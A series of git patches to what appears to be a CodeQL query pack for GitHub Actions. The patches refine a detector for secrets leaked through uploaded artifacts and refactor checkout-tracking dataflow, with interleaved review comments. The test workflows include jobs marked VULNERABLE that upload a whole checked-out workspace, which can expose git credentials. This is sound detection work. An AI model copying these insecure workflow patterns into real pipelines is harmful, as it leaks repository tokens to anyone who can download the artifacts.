diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
new file mode 100644
index 00000000000..c9bb538a12d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
@@ -0,0 +1,2 @@
+Security/CWE-312/SecretsInArtifacts.ql
+
From 6eef51e4154410af85604069a74a202d576052fb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 6 Sep 2024 17:22:44 +0200
Subject: [PATCH 0487/1267] fix: add path checks
---
 ql/src/Security/CWE-312/SecretsInArtifacts.ql | 8 ++-
 .../workflows/secrets-in-artifacts.yml | 51 +++++++++++++++++--
 .../CWE-312/SecretsInArtifacts.expected | 3 ++
 3 files changed, 56 insertions(+), 6 deletions(-)
diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql
index 07e498706d8..e2d8ba93452 100644
--- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql
+++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql
@@ -35,6 +35,12 @@ where
 "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", //
 "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", //
 "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", //
- ]
+ ] and
+ (
+ not exists(checkout.getArgument("path")) and
+ upload.getArgument("path") = [".", "*"]
+ or
+ checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path")
+ )
 select upload, "A secret is exposed in a public artifact uploaded by $@", upload,
 "actions/upload-artifact"
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
index 611ac16dcfa..f77a2ab30d3 100644
--- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
@@ -2,7 +2,7 @@ name: secrets-in-artifacts
 on:
 pull_request:
 jobs:
- test1:
+ test1: # VULNERABLE
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
@@ -10,8 +10,8 @@ jobs:
 uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
 with:
 name: file
- path: results
- test2:
+ path: .
+ test2: # NOT VULNERABLE
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
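Review bot: The added path condition compares the two `path` arguments only as exact strings, so a checkout into a subdirectory combined with an upload of the whole workspace is not reported. With `path: foo` on the checkout and `path: .` on the upload, the first disjunct fails on `not exists(checkout.getArgument("path"))` and the second on the string equality, although the artifact would presumably still contain the checkout's `.git` directory. Consider making the whole-workspace upload a disjunct of its own, at least for `upload.getArgument("path") = "."`, without the `not exists(...)` guard, and adding a fixture job for that combination next to `test4` to `test6`. Equivalent spellings such as `./` or a multi-line `path` list are also missed by the equality and deserve a comment naming them as known gaps. The `where` clause starts outside the hunk.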
@@ -19,5 +19,46 @@ jobs: uses: actions/upload-artifact@v4 with: name: file - path: results - + path: . + test3: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: "*" + test4: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo + test5: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo/* + test6: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: pr + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 67c7fd6e8aa..1c7fd8ab2ce 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected 
@@ -1 +1,4 @@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | From 37fc6156d09c506e1453c466c84ee6697f0efa88 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:30:49 +0200 Subject: [PATCH 0488/1267] Removing experimental flag --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index e2d8ba93452..a7ed799f761 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -8,7 +8,6 @@ * @id actions/secrets-in-artifacts * @tags actions * security - * experimental * external/cwe/cwe-312 */ From 25eb417acc989030ceb3acedd368ad584a671eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:32:35 +0200 Subject: [PATCH 0489/1267] Remove public wording --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index a7ed799f761..494a955f96b 100644 
--- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -41,5 +41,5 @@ where or checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path") ) -select upload, "A secret is exposed in a public artifact uploaded by $@", upload, +select upload, "A secret is exposed in an artifact uploaded by $@", upload, "actions/upload-artifact" From 5e92026f145157c114040568ef4822fc465fff68 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:34:55 +0200 Subject: [PATCH 0490/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3fb25b389f8..046015a5da8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.38 +version: 0.1.39 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c806f76f42b..827836a2dce 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.38 +version: 0.1.39 groups: [actions, queries] suites: codeql-suites extractor: javascript From 72e0851e910db7a85a545d6b0d058451812a17d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:16 +0200 Subject: [PATCH 0491/1267] Update metadata for Secrets in Artifact query --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 7 ++++--- .../Security/CWE-312/SecretsInArtifacts.expected | 8 ++++---- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index 494a955f96b..836f1c7dec2 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql 
@@ -1,9 +1,10 @@ /** - * @name Secret In Artifacts - * @description Secrets are exposed in GitHub Artifacts + * @name Storage of sensitive information in GitHub Actions artifact + * @description Including sensitive information in a GitHub Actions artifact can + * expose it to an attacker. * @kind problem * @problem.severity error - * @security-severity 9.0 + * @security-severity 7.5 * @precision high * @id actions/secrets-in-artifacts * @tags actions diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 1c7fd8ab2ce..86ac293521c 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected 
@@ -1,4 +1,4 @@
-| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact |
-| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact |
-| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact |
-| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact |
+| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact |
+| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact |
+| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact |
+| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact |
From 84b02febfe014642dadd572da3942713dea2a8ac Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:53 +0200 Subject: [PATCH 0492/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 046015a5da8..1a3918d5d98 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.39 +version: 0.1.40 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 827836a2dce..64d40f75480 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.39 +version: 0.1.40 groups: [actions, queries] suites: codeql-suites extractor: javascript From 279b0bb8f175e9b968972ed170fe9f964e8d311d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:33:46 +0200 Subject: [PATCH 0493/1267] Change description for CWE-1395 query --- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md | 2 +- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md index 61fab1d8ed4..91360a30ed8 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -2,7 +2,7 @@ ## Description -The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize GitHub Actions with known vulnerabilities. ## Recommendations 
diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index c0a81b66a48..497a3b9feb9 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -1,6 +1,6 @@ /** - * @name Use of known vulnerable 3rd party action. - * @description The workflow is using a known vulnerable 3rd party action. + * @name Use of a known vulnerable action. + * @description The workflow is using an action with known vulnerabilities. * @kind problem * @problem.severity error * @security-severity 7.5 From 2720aaf0972e62691ff50af8bc9545a1f55e918e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:36:29 +0200 Subject: [PATCH 0494/1267] Add new test for secrets in artifact query --- .../workflows/secrets-in-artifacts.yml | 23 +++++++++++++++++++ .../CWE-312/SecretsInArtifacts.expected | 1 + 2 files changed, 24 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index f77a2ab30d3..473d5998695 100644 --- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -62,3 +62,26 @@ jobs: with: name: file path: foo + test7: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + test8: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + 
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 86ac293521c..0acb306b9d6 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -2,3 +2,4 @@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | actions/upload-artifact | From f9d66d9b5e1c95885a49b45b4a3b384e8f78a847 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:37:00 +0200 Subject: [PATCH 0495/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1a3918d5d98..0392a200bb4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.40 +version: 0.1.41 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 64d40f75480..5b81393abdb 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.40 +version: 0.1.41 groups: [actions, queries] suites: codeql-suites extractor: javascript From 42b487b348329db069d1fc0b4f1bc542fe5b17ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:49:43 +0200 Subject: [PATCH 0496/1267] Match callers and callees when root is not the repo root When running codeql test run, the root of the database is not the root of the original repo (the directory containing .github and .git) therefore calls to reusable workflows are not correctly matched. --- .../dataflow/internal/DataFlowPrivate.qll | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 47cd38d47fa..2d391841410 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,7 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::Node).getLocation() } } /** @@ -97,7 +97,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() + then + result = + this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .suffix(this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .indexOf("/.github/workflows") + 1) else if this instanceof CompositeAction then 
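Review bot: In `DataFlowCallable.getName()` the new `ReusableWorkflow` branch computes `suffix(... .indexOf("/.github/workflows") + 1)`, and `indexOf` has no result when the substring is absent. If `getRelativePath()` returns `.github/workflows/x.yml` for a database rooted at the repository (no leading `/`), this branch yields no name at all and calls to reusable workflows would stop resolving, silently dropping cross-workflow taint flow. This should be confirmed on a normally built database, since the commit message describes the test layout only. Binding the path once and falling back to the unstripped path covers both layouts and removes the duplicated call chain. The `if`/`else` chain continues past the end of this hunk.

```ql
then
  exists(string path |
    path = this.(ReusableWorkflow).getLocation().getFile().getRelativePath()
  |
    // nested root (e.g. test databases): strip everything before ".github/workflows"
    result = path.suffix(path.indexOf("/.github/workflows") + 1)
    or
    // repository-rooted database: the path already starts at ".github/workflows"
    not exists(path.indexOf("/.github/workflows")) and
    result = path
  )
// … unchanged: CompositeAction and remaining branches …
```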
@@ -118,7 +128,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { int totalorder() { none() } /** Gets the location of this callable. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::CfgScope).getLocation() } } newtype TReturnKind = TNormalReturn() @@ -380,8 +390,8 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or + artifactToOutputStoreStep(node1, node2, c) or artifactToEnvStoreStep(node1, node2, c) } From bd0c762781df6f3c1d69ad2d114600d18904b55c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:51:32 +0200 Subject: [PATCH 0497/1267] Refactor: Do not use PRHeadCheckoutStep on any dependency of TaintTracking Problem is that there are StoreSteps that depend on PRHeadCheckout so there is a non-monotic recursion error since PRHeadCheckout depends on TaintTracking module, but this module depends on PRHeadCheckout --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 ++++++++++--------- .../security/OutputClobberingQuery.qll | 11 +++++- 2 files changed, 29 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index aa31954ad3c..9ca17eb4dab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -155,6 +155,20 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: ) } +predicate controlledCWD(Step artifact) { + artifact instanceof UntrustedArtifactDownloadStep or + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + artifact.(Uses).getCallee() = "actions/checkout" or + artifact instanceof GitMutableRefCheckout or + artifact instanceof GitSHACheckout or + artifact instanceof GhMutableRefCheckout or + artifact instanceof GhSHACheckout +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 @@ -165,10 +179,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, Step artifact, string content, string key, string value | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | @@ -207,10 +218,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, Step artifact | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | 
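Review bot: The new `controlledCWD` predicate replaces `PRHeadCheckoutStep` with `artifact.(Uses).getCallee() = "actions/checkout"`, which holds for every checkout step, including one that checks out the trusted base branch. The four predicates in this file that now call it, and the copy of the same list in `OutputClobberingFromFileReadSink` later in this commit, will therefore treat files from any checkout as attacker-controlled, so extra alerts are to be expected. That trade-off belongs in a QLDoc comment on the predicate, for example `/** Holds if artifact may place untrusted files in the working directory. Over-approximates: any actions/checkout step qualifies. */`. The inline comment also has typos (`shoould`, `anc`, `non-Monolitic` for non-monotonic), and the sink class could call `controlledCWD(step)` instead of repeating the list, assuming FlowSteps.qll is in scope there.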
@@ -246,25 +254,20 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Run run | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and artifact.getAFollowingStep() = run ) } +// /** * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5a85c22bb8f..38a8d2b9d0b 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -22,7 +22,16 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, Step step | ( step instanceof UntrustedArtifactDownloadStep or - step instanceof PRHeadCheckoutStep + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + step.(Uses).getCallee() = "actions/checkout" or + step instanceof GitMutableRefCheckout or + step instanceof GitSHACheckout or + step instanceof GhMutableRefCheckout or + step instanceof GhSHACheckout ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and From 147da50cb993e35cc7831cd5ccf1efd573895255 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:09 +0200 Subject: [PATCH 0498/1267] Use Taint Tracking to track PR refs to checkout's ref argument --- .../security/UntrustedCheckoutQuery.qll | 150 +++++++++++------- 1 file changed, 95 insertions(+), 55 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 7cfda4da49c..df3e1e4d8a2 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -1,12 +1,90 @@ import actions -import codeql.actions.DataFlow +private import codeql.actions.DataFlow +private import codeql.actions.TaintTracking -string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" +/** + * A taint-tracking configuration for PR HEAD references flowing + * into actions/checkout's ref argument. + */ +private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) + ) + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } } +module ActionsMutableRefCheckoutFlow = TaintTracking::Global; + +private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR head/merge commit sha + exists(Expression e | + source.asExpr() = e and + 
containsHeadSHA(e.getExpression()) + ) + or + // 3rd party actions returning the PR head sha + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_sha" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadSha", "mergeCommitSha"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } +} + +module ActionsSHACheckoutFlow = TaintTracking::Global; + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -73,6 +151,12 @@ predicate containsHeadRef(string s) { ) } +private string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); 
